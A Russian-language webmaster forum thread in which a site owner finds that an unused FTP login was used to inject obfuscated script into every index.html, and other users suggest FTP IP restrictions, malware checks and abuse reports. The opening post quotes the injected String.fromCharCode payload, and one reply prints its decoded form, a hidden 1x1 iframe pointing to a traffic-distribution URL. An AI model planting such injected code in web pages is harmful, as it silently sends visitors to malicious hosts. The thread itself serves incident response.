Новая тема   Ответить

 dlk44
сегодня случайно увидил по статистике заход с FTP аккаунта которым давно уже не пользуюсь. Стал проверять - во всех папках в index.html дописан код:

<script> document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,101,118,105,108,112,111,105,110,116,46,110,101,116,47,116,100,115,47,105,110,100,101,120,46,112,104,112,63,111,117,116,61,49,50,48,53,57,50,53,53,57,53,34,32,119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49,32,62,60,47,105,102,114,97,109,101,62,13,10))</script>

Что это такое? Кто-то с таким сталкивался? Как лечить и бороться?

Я файлы конечно переписал и FTP аккаунт этот настроил чтобы заходил он только в пустую папку которую я только что сделал.

 _s_[sov]
шляпа какая та кадированая в js.
удали ето все нахер, инфрейм пади какой нить

 ritor
Дык поломали наверное... и ифрейм ставят .

 -=Faraon=-
<iframe src="http://evilpoint.net/tds/index.php?out=1205925595" width=1 height=1 ></iframe>
такой фрейм грузят!!!
Допуск к фтп по IP сделай!

 weely6
что на сайтах, если старые версии ATL, то через них скорее всего ломанули, последний 17 билд.

 dlk44
Вобщем код я этот конечно вычистил. FTP логин этот настроил так чтобы юзер попадал сразу в пустую папку где я положил index.html Через пару часов проверю добавили в него код или нет.

 dlk44
Sveridoff писал:

На сайтах простая html статика. Похоже что именно этот конкретный FTP логин увели.

 ritor
Закрой вход по айпи с айпи отличных от твоего, если ломали по фтп, то поможет в 90% случаев.

 dlk44


"ломали по FTP" - это в смысле к FTP перебором подбирали пароль? А логин они где взяли?

А какие еще могут быть тут варианты взлома?

 rusawm
dlk44 писал:

возможно трой у тебя на компе. какой фтп клиент юзаешь?

 dlk44
rusawm писал:

FTP Клиент - FAR. У меня в нем настроено 15 разных FTP логинов к разным серверам - только что проверял на остальных все OK нет никакого вредоностного кода на страницах. А тот логин что похоже взломали - я его
отдавал в пользование другому челу какой у него клиент я не знаю у него похоже и сперли. Или пароль подобрали (там простой цифровой пароль) а может базу стырили у хостера потому что я только что проверил - это FTP логин мне выдал хостер еще при покупке хостинга и было это более года назад. Я им немного попользовался, сделал себе новый FTP логин и пользовался дальше уже новым. А тут смотрю сегодня статистику - кто-то заходил на FTP по этому старому логину. Вот я и заподозрил неладное...

У меня на компе стоит Фаервол Agnitum + Dr.Web

 localhost
если хостинг виртуальный, как вариант, через дырку заифреймили клиентов,
например вебшеллом

 dlk44


Хостинг виртуальный.

А где можно прочитать про уязвимости/дырки и про то как работают эти вебшеллы? Хотя бы общие принципы.

 KpeBeg
Если голый хтмл и уверен что пароль никто не мог увести, значит поломали локально.
Вебшелл - это скрипт для выполнения команд на сервере, и прочих гадостей, редактирование, удаление файлов в общем все что душе угодно.
На securitylab.ru в разделе уязвимости поищи если у тебя какие то скрипты стоят и проверь их, а если только хтмл файлы лежат, то тут либо фтп, либо локально.

 dlk44


У меня нет никаких скриптов. Я проверял все сайты - никаких новых файлов/папок не появилось. Так что очень похоже что таки каким-то способом увели конкретный FTP логин и добавили этот код в index файлы. Разумеется как именнно увели этот FTP логин теперь уже и не узнаешь, но я его заблокировал и сейчас вроде все OK. Но теперь конечно переодически проверяю размеры index файлов - изменился он или нет. Вот думаю - это нормально делать или это приведет к развитию мании преследования?

 Sergeyka
Поздравляю!
Ты схзватил троян, который увел твои пассы на ФТП, АСЬКУ и все что лежит на поверхности

Взлом ФТП произошел понаставили код, который ты привел в первом посте, в этом коде зашифрован УРЛ куда уходит твой траф, скорей всего там ТДС стоит, расковыряй Джаву, вытащи домен и катай абузы хостинговой компании и домен регистранту, после того если прикроют их лавочку скрипт будет бесполезен


ЗЫ
Чисть комп

 Kors
Sergeyka писал:
если у него еще 15 фтп в ФАРе прпоисано азаифреймили только 1 - то скорее всего троян у того кому давал этот логин.

 dlk44
Kors писал:

Я тоже так думаю.

А еще как вариант я слышал что хакеры ломают хостеров и уводят базы с логинами/паролями на FTP, а потом эти базы продают. Потому как этот FTP логин как раз тот что по умолчанию сделал мне хостер.

 dlk44
Sergeyka писал:

Нет у меня на компе никаких троянов. Из 15 FTP логинов увели только один.